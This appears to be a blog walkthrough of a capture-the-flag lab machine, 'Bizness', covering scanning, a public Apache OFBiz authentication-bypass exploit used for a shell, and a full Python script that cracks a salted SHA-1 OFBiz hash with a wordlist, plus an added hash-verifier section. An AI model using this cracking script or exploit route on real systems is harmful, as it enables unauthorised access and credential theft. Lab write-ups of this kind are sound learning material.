The Great Bizness Adventure with Rian Friedt

Rian Friedt
4 min read · Jan 10, 2024


INTRODUCTION

Yo, fellow hackers! It’s ya boy, Rian Friedt, back with another cyber escapade! 🕵️‍♂️💻 Season 4 just dropped and with it, the “Bizness” machine — a 20-pointer with an ‘easy peasy lemon squeezy’ difficulty level. So, let’s dive into this digital jungle and do some bizness!

Getting Our Feet Wet

First things first, we gotta prep our /etc/hosts file so that bizness.htb resolves to the box’s IP, 10.10.11.252. Trust me, skipping this step is like trying to bake a cake without flour — it just won’t work! So, pop open your terminal and type away:

sudo nano /etc/hosts

SCANNING: The Treasure Hunt Begins

Armed with nmap, our trusty digital compass, we set sail:

nmap -Pn -sC -sV 10.10.11.252

And what do we find? Ports 80 and 443 waving at us like flags on a deserted island. Next stop, the web page bizness.htb! 🏴‍☠️🌐

Digging Deeper: The Dirsearch Saga

Next, we summon the mystical dirsearch tool to uncover hidden endpoints. It’s like playing hide and seek with the internet:

sudo apt-get install dirsearch
dirsearch -u https://bizness.htb

Dirsearch turns up the login endpoints. Boom! /control/login is where the login page lives, so we head over there. It’s time to crash this login party!

Cracking the Code: The Apache OFBiz Adventure

Upon landing on the login panel, we find it’s running on the Apache OFBiz web framework. A little bit of digital detective work (a.k.a. Googling) leads us to this:

GitHub — jakabakos/Apache-OFBiz-Authentication-Bypass

Jackpot! This authentication bypass lets us execute arbitrary commands on the server, so we can commandeer the system. Let’s gear up for some reverse shell action!

Setting up the nc listener

After firing the exploit, we got a shell.

We used a quick command to make the shell more stable and sexy!

cd /home/ofbiz

cat user.txt

User flag: “78434809d644????????????????????????????”.

The Final Showdown: Cracking the Hash

In the depths of the server, I discovered the Derby database and unearthed a cryptic clue: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN. It smelled like a SHA-1 hash with a pinch of salt (the “d” between the dollar signs). So, I whipped up this Python potion to crack it:

import hashlib
import base64
import os
from tqdm import tqdm


class PasswordEncryptor:
    def __init__(self, hash_type="SHA", pbkdf2_iterations=10000):
        """
        Initialize the PasswordEncryptor object with a hash type and PBKDF2 iterations.
        :param hash_type: The hash algorithm to use (default is SHA).
        :param pbkdf2_iterations: The number of iterations for PBKDF2 (default is 10000).
        """
        self.hash_type = hash_type
        self.pbkdf2_iterations = pbkdf2_iterations

    def crypt_bytes(self, salt, value):
        """
        Hash a password the way OFBiz does: digest(salt || password), then
        format it as $TYPE$salt$base64digest.
        :param salt: The salt used in the hash.
        :param value: The password bytes to be hashed.
        :return: The formatted hash string.
        """
        if not salt:
            # No salt given: generate a random one, as OFBiz does for new passwords.
            salt = base64.urlsafe_b64encode(os.urandom(16)).decode('utf-8')
        hash_obj = hashlib.new(self.hash_type)
        hash_obj.update(salt.encode('utf-8'))
        hash_obj.update(value)
        hashed_bytes = hash_obj.digest()
        # replace('+', '.') mirrors the Java code; it is a no-op for URL-safe Base64.
        result = f"${self.hash_type}${salt}${base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')}"
        return result

    def get_crypted_bytes(self, salt, value):
        """
        Get only the Base64 digest part for a password.
        :param salt: The salt used in the hash.
        :param value: The password bytes to hash.
        :return: The URL-safe Base64 digest as a string.
        """
        try:
            hash_obj = hashlib.new(self.hash_type)
            hash_obj.update(salt.encode('utf-8'))
            hash_obj.update(value)
            hashed_bytes = hash_obj.digest()
            return base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')
        except ValueError as e:
            # hashlib.new raises ValueError for an unknown algorithm name.
            raise Exception(f"Error while computing hash of type {self.hash_type}: {e}")


# Example usage:
# OFBiz writes "SHA" (Java's name for SHA-1) and unpadded Base64; Python's hashlib
# wants "SHA1" and emits a trailing "=", so the search string is adjusted to match.
hash_type = "SHA1"
salt = "d"
search = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I="
wordlist = '/usr/wordlist/rockyou.txt'

# Create an instance of the PasswordEncryptor class
encryptor = PasswordEncryptor(hash_type)

# Get the number of lines in the wordlist for the loading bar
with open(wordlist, 'r', encoding='latin-1') as f:
    total_lines = sum(1 for _ in f)

# Iterate through the wordlist with a loading bar and check for a matching password
with open(wordlist, 'r', encoding='latin-1') as password_list:
    for password in tqdm(password_list, total=total_lines, desc="Processing"):
        value = password.strip()

        # Hash the candidate with the known salt
        hashed_password = encryptor.crypt_bytes(salt, value.encode('utf-8'))

        # Compare with the search hash
        if hashed_password == search:
            print(f'Found Password:{value}, hash:{hashed_password}')
            break  # Stop the loop if a match is found
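The OFBiz hash format itself, as an added example (not code from the original post or from the OFBiz project): it parses a `$TYPE$salt$digest` string, recomputes the digest over salt followed by password the way OFBiz does, and compares in constant time. Java's `MessageDigest` name "SHA" means SHA-1 and its URL-safe Base64 omits `=` padding, which is why the script above had to rewrite the prefix to `$SHA1$` and append `=`; the verifier below normalizes both, so a stored value can be checked as-is. The password and the SHA-256 variant are constructed for the demo.

```python
import base64
import hashlib
import hmac

# Java MessageDigest names seen in the $TYPE$salt$digest prefix, mapped to hashlib names.
# "SHA" is Java's alias for SHA-1, which is why the page's digest is 20 bytes long.
_JAVA_TO_HASHLIB = {"SHA": "sha1", "SHA1": "sha1", "SHA-1": "sha1",
                    "SHA-256": "sha256", "SHA-512": "sha512"}


def _b64_urlsafe_nopad(raw: bytes) -> str:
    # commons-codec encodeBase64URLSafeString emits no '=' padding; Python's does, so strip it.
    return base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")


def parse_ofbiz_hash(stored: str):
    """Split an OFBiz '$TYPE$salt$digest' string into (hashlib name, salt, digest)."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError(f"not an OFBiz-style hash: {stored!r}")
    _, hash_type, salt, digest = parts
    if hash_type.upper() not in _JAVA_TO_HASHLIB:
        raise ValueError(f"unsupported hash type: {hash_type!r}")
    return _JAVA_TO_HASHLIB[hash_type.upper()], salt, digest


def _digest(algo: str, salt: str, password: str) -> str:
    # OFBiz hashes the salt bytes followed by the password bytes, with no separator.
    h = hashlib.new(algo)
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    return _b64_urlsafe_nopad(h.digest())


def ofbiz_hash(password: str, salt: str, hash_type: str = "SHA") -> str:
    """Produce a stored-format hash exactly as OFBiz writes it (unpadded Base64)."""
    algo = _JAVA_TO_HASHLIB[hash_type.upper()]
    return f"${hash_type}${salt}${_digest(algo, salt, password)}"


def verify_ofbiz_password(stored: str, candidate: str) -> bool:
    """Check a candidate against a stored hash; padded and unpadded digests both verify."""
    algo, salt, digest = parse_ofbiz_hash(stored)
    computed = _digest(algo, salt, candidate)
    return hmac.compare_digest(computed, digest.rstrip("="))


if __name__ == "__main__":
    # Constructed demo values, not the machine's real credentials.
    stored = ofbiz_hash("constructed-demo-password", "d")
    print(stored, verify_ofbiz_password(stored, "constructed-demo-password"))
```

A one-character salt and a single fast SHA-1 round are what make the wordlist loop above cheap to run; the `pbkdf2_iterations` the script's class accepts is never applied to the hash.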

The Moment of Triumph: Root Flag Victory!

With the password “monke????????” in hand, I escalated my privileges, sauntered into the root directory, and there it was — the elusive root.txt!

🚩 Root flag conquered:

And that, my fellow adventurers, is how it’s done! We conquered the Bizness beast! Until next time ❤
